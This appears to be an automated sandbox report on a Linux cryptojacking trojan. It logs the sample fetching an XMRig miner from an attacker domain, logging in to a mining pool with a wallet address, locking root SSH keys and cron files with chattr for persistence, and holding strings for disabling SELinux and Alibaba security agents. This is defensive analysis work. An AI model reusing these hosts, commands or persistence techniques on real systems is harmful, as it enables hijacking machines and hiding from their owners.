        Source: global trafficTCP traffic: 192.168.2.13:55906 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55908 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55910 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55912 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55914 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55916 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55918 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55920 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55922 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55924 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55926 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55928 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55930 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55932 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55934 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: global trafficTCP traffic: 192.168.2.13:55936 -> 176.32.39.18:3334 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"hvxydzfahri5zxomny3d5g8jvzxqgqjauz3xqn5iuzvsqzb7j13zkqt9movi2lmtrqapp2kuutknbxhnrdthxpza89ghhxcwfj","pass":"x","agent":"xmrig/6.18.0 (linux x86_64) libuv/1.42.1-dev gcc/11.2.0","algo":["cn-heavy/xhv","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-heavy/0","cn-heavy/tube","cn/1","rx/0","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja"]}}.
        Source: sh, 5531.1.0000000000400000.0000000000886000.r-x.sdmpString found in binary or memory: stratum+ssl://randomx.xmrig.com:443
        Source: sh, 5531.1.0000000000400000.0000000000886000.r-x.sdmpString found in binary or memory: cryptonight/0
        Source: sh, 5531.1.0000000000400000.0000000000886000.r-x.sdmpString found in binary or memory: -o, --url=URL URL of mining server
        Source: sh, 5531.1.0000000000400000.0000000000886000.r-x.sdmpString found in binary or memory: stratum+tcp://
        Source: sh, 5531.1.0000000000400000.0000000000886000.r-x.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
        Source: sh, 5531.1.0000000000400000.0000000000886000.r-x.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
        Source: /tmp/.miner (PID: 5531)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_cpusJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/die_cpusJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/package_cpusJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_setsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partitionJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_setsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partitionJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_setsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partitionJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_cpusJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/core_idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/die_cpusJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/package_cpusJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/topology/physical_package_idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/coherency_line_sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/number_of_setsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index0/physical_line_partitionJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index1/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/coherency_line_sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/number_of_setsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index2/physical_line_partitionJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/shared_cpu_mapJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/levelJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/typeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/idJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/coherency_line_sizeJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/number_of_setsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/cpu1/cache/index3/physical_line_partitionJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads CPU info from /sys: /sys/devices/system/cpu/possibleJump to behavior
        Source: gif.elfString: md5sum %s/usr/sbin/sestatus/usr/sbin/setenforcedisabled/etc/selinux/config/tmp/uninstall.shlsmod |grep -i AliSecGuard/root/.ssh/usr/bin/chattrrm -rf %schattr +i %s/etc/cron.d/var/spool/cron/crontabs/etc/cron.hourly/usr/include/%s/usr/include/usr/bin/curl/usr/bin/wget/usr/bin/cur/usr/bin/url/usr/bin/wge/usr/bin/get/usr/bin/cd1/usr/bin/cdt/usr/bin/wd1%cAliYunDunMonitorAliYunDunUpdateAliYunDungold%d.tar.gzgold%d-%d.tar.gz/usr/include/gold%d./install.shanolis%d.tar.gzanolis%d-%d.tar.gz/usr/include/anolis%d/usr/bin/ttyrocky%d.tar.gzrocky%d-%d.tar.gz/usr/include/rocky%dstream%d.tar.gzstream%d-%d.tar.gz/usr/include/stream%deuler%d.tar.gzeuler%d-%d.tar.gz/usr/include/euler%dredhatubuntudebian0.0.22version %s
        Source: global trafficTCP traffic: 192.168.2.13:55876 -> 176.32.39.18:3334
        Source: /usr/bin/curl (PID: 5524)Reads hosts file: /etc/hostsJump to behavior
        Source: /tmp/.miner (PID: 5531)Reads hosts file: /etc/hostsJump to behavior
        Source: /tmp/.miner (PID: 5534)Reads hosts file: /etc/hostsJump to behavior
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /miner HTTP/1.1Host: w.softprojectcode.comUser-Agent: curl/7.68.0Accept: */*
        Source: global trafficDNS traffic detected: DNS query: w.softprojectcode.com
        Source: global trafficDNS traffic detected: DNS query: o.softgoldinformation.com
        Source: global trafficDNS traffic detected: DNS query: o4.softgoldinformation.com
        Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
        Source: .miner.94.drString found in binary or memory: http://upx.sf.net
        Source: gif.elfString found in binary or memory: http://w.softprojectcode.com/%s
        Source: gif.elfString found in binary or memory: http://w.softprojectcode.com/miner
        Source: gif.elf, watch.48.dr, watch.50.drString found in binary or memory: http://z.shavsl.com/b
        Source: sh, 5531.1.0000000000400000.0000000000886000.r-x.sdmp, .miner, 5531.1.0000000000400000.0000000000886000.r-x.sdmpString found in binary or memory: https://gcc.gnu.org/bugs
        Source: sh, 5531.1.0000000000400000.0000000000886000.r-x.sdmp, .miner, 5531.1.0000000000400000.0000000000886000.r-x.sdmpString found in binary or memory: https://gcc.gnu.org/bugsNSt7__cxx1115basic_stringbufIcSt11char_traitsIcESaIcEEENSt7__cxx1119basic_is
        Source: sh, 5531.1.0000000000400000.0000000000886000.r-x.sdmp, .miner, 5531.1.0000000000400000.0000000000886000.r-x.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms
        Source: sh, 5531.1.0000000000400000.0000000000886000.r-x.sdmp, .miner, 5531.1.0000000000400000.0000000000886000.r-x.sdmpString found in binary or memory: https://xmrig.com/wizard
        Source: sh, 5531.1.0000000000400000.0000000000886000.r-x.sdmp, .miner, 5531.1.0000000000400000.0000000000886000.r-x.sdmpString found in binary or memory: https://xmrig.com/wizard%s

        System Summary

        barindex
        Source: 5531.1.0000000000400000.0000000000886000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
        Source: 5531.1.0000000000400000.0000000000886000.r-x.sdmp, type: MEMORYMatched rule: Detects XMRig ELF Author: Sekoia.io
        Source: 5531.1.0000000000400000.0000000000886000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Pornoasset_927f314f reference_sample = d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Pornoasset, fingerprint = 7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf, id = 927f314f-2cbb-4f87-b75c-9aa5ef758599, last_modified = 2021-09-16
        Source: 5531.1.0000000000400000.0000000000886000.r-x.sdmp, type: MEMORYMatched rule: miner_lin_xmrig_strings author = Sekoia.io, description = Detects XMRig ELF, creation_date = 2022-09-08, classification = TLP:CLEAR, version = 1.0, modification_date = 2024-01-04, id = 2f99020b-424c-4433-860c-5e9ab4e1f1de
        Source: classification engineClassification label: mal100.troj.evad.mine.linELF@0/10@12/0

        Persistence and Installation Behavior

        barindex
        Source: /bin/sh (PID: 5490)Args: chattr +i /root/.ssh/authorized_keys2Jump to behavior
        Source: /bin/sh (PID: 5504)Args: chattr +i /etc/cron.d/watchJump to behavior
        Source: /bin/sh (PID: 5510)Args: chattr +i /etc/cron.hourly/prelinkJump to behavior
        Source: /bin/sh (PID: 5516)Args: chattr +i /root/.ssh/authorized_keysJump to behavior
        Source: /bin/sh (PID: 5522)Args: chattr +i /root/.ssh/authorized_keys2Jump to behavior
        Source: /tmp/.miner (PID: 5531)File: /proc/5531/mountsJump to behavior
        Source: /bin/sh (PID: 5501)File: /etc/cron.d/watchJump to behavior
        Source: /bin/sh (PID: 5502)File: /etc/cron.d/watchJump to behavior
        Source: /bin/sh (PID: 5505)File: /etc/cron.hourly/prelinkJump to behavior
        Source: /bin/sh (PID: 5506)File: /etc/cron.hourly/prelinkJump to behavior
        Source: /usr/bin/chmod (PID: 5508)File: /etc/cron.hourly/prelink (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /bin/sh (PID: 5581)Killall command executed: killall .sshd xrig gettyJump to behavior
        Source: /tmp/gif.elf (PID: 5484)Directory: /root/.sshJump to behavior
        Source: /usr/bin/chattr (PID: 5486)Directory: /root/.sshJump to behavior
        Source: /usr/bin/chattr (PID: 5486)Directory: /root/.sshJump to behavior
        Source: /usr/bin/chattr (PID: 5492)Directory: /etc/cron.d/.placeholderJump to behavior
        Source: /usr/bin/chattr (PID: 5496)Directory: /var/spool/cron/atjobs/.SEQJump to behavior
        Source: /usr/bin/chattr (PID: 5500)Directory: /etc/cron.hourly/.placeholderJump to behavior
        Source: /usr/bin/chattr (PID: 5512)Directory: /root/.sshJump to behavior
        Source: /usr/bin/chattr (PID: 5512)Directory: /root/.sshJump to behavior
        Source: /usr/bin/chattr (PID: 5518)Directory: /root/.sshJump to behavior
        Source: /usr/bin/chattr (PID: 5518)Directory: /root/.sshJump to behavior
        Source: /usr/bin/curl (PID: 5524)Directory: /root/.curlrcJump to behavior
        Source: /usr/bin/curl (PID: 5524)File: /tmp/.minerJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/230/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/110/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/231/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/111/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/232/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/112/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/233/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/113/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/234/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/114/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/235/statJump to behavior
        Source: /usr/bin/killall (PID: 5581)File opened: /proc/115/statJump to behavior
